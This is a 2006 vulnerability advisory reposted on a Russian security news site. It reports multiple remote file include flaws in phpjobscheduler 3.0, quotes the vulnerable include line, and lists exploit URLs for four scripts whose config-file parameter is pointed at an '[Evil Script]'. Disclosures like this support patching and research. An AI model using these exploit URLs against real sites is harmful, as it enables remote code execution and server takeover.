Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  SiteXpress SQL Injection

  SiteXpress SQL Injection

  [Full-disclosure] Advisory 14/2006: Dotdeb PHP Email Header Injection Vulnerability

  ASPintranet SQL Injection

From:firewall1954_(at)_hotmail.com <firewall1954_(at)_hotmail.com>
Date:14 ноября 2006 г.
Subject:Phpjobscheduler 3.0 - Multiple Remote File Include

======================================================================
# Phpjobscheduler 3.0  - Multiple Remote File Include by Firewall
                     

# Application Affect:
                  phpjobscheduler 3.0

# Source Code:             
                  http://scripts.ringsworld.com/development-tools/phpjobscheduler
.v3.0.zip


# Code:
                  include_once($installed_config_file)
       
# ExPloit :
  http://www.site.com/phpjobschedule_PATH/add-modify.php?installed_config_file=[E
vil Script]
http://www.site.com/phpjobschedule_PATH/delete.php?installed_config_file=[Evil Script]
http://www.site.com/phpjobschedule_PATH/modify.php?installed_config_file=[Evil Script]
http://www.site.com/phpjobschedule_PATH/phpjobscheduler.php?installed_config_file
=
[Evil Script]


# Contact:    
                  [email protected]

# GrEatZ :

|Her0|slackwaren|Ozzmadark|slappter|ArCaX-ATH|CiberPunk|saok|
|Cvir.System|napster|Matasanos|Zlevyn|Azrael|CyberAlexis|
|NitroNet|Matasanos|SysRoot|_ANtrAX_|FaLENcE|Mnox|Xneo.System|

"El ceviche y El pisco es peruano y jamas podran igualar su calidad"
                        "Viva el Peru"

======================================================================

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород